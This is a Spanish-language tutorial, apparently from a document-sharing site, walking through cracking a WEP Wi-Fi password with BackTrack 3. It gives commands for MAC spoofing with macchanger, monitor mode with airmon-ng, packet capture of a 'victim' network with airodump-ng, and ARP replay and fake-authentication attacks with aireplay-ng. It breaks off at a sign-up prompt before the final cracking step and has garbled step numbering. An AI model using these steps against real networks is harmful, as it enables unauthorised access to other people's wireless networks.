Ingeniero De Sistemas
Arrancamos BACKTRACK 3 LIVE
Paso 2
Abrimos un Shell - Konsole
Escribimos la siguiente instruccion:
00:22:69:4c:44:c8
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng stop ath0wlan0
[pic]
Paso 3
Escribimos la siguiente instruccion:
airmon-ng start wifi0
[pic]
Paso 4
Escribimos la siguiente instruccion: Con esta instruccion vamos a observar la MAC de nuestratarjeta de red inalambrica, es importante que la apuntemos ya que sera necesaria en los siguientes pasos, en mi caso es la 00:24:2C:45:34:86 importante los dos puntos y las mayusculas.
iwconfig[pic]
Paso 5
Escribimos las siguiente instruccion:
airodump-ng ath0
[pic]
Nos aparecera algo parecido a esto, donde nos mostrara las redes que estan a nuestro alcance.
[pic]
Donde devemosde apuntar los siguiente
BSSID: MAC de la victima
CH: CANAL de la victima
ESSID: Nombre de red de la victima (MAYUSCULAS Y minusculas cuentan)
Paso 6
Escribimos las siguiente instruccion:airodump-ng --channel x --write xxxx ath0
Donde x es el canal de la victima y xxxx un nombre cual quiera, donde se almacenara la clave que obtengamos, la mia quedaria asi.
airodump-ng --channel 6--write pass ath0
[pic]
Aparece algo como esto, dejamos esta shell - konsole abierta y abrimos otra
[pic]
Paso 7
Escribimos las siguiente instruccion:
aireplay-ng -3 -b (mac de la victima) -h(nuestra mac) ath0
[pic]
Con esta instruccion comenzaremos el ataque y lanzamiento de paquetes, donde devemos de poner atencion a los ARP, con unos 60000 sera mas que suficiente.
Abrimos otra shell,en este momento deveriamos tener por lo menos 2 shell abiertas
Paso 7
Escribimos las siguiente instruccion:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0
[pic]
Estainstruccion permite que podamos lanzar un ataque mas sertero y observaremos como los ARP suben a lo loco.
Teniendo los ARP a 60000, ya podemos realizar el ataque final
Paso 7
Escribimos las siguiente...
Regístrate para leer el documento completo.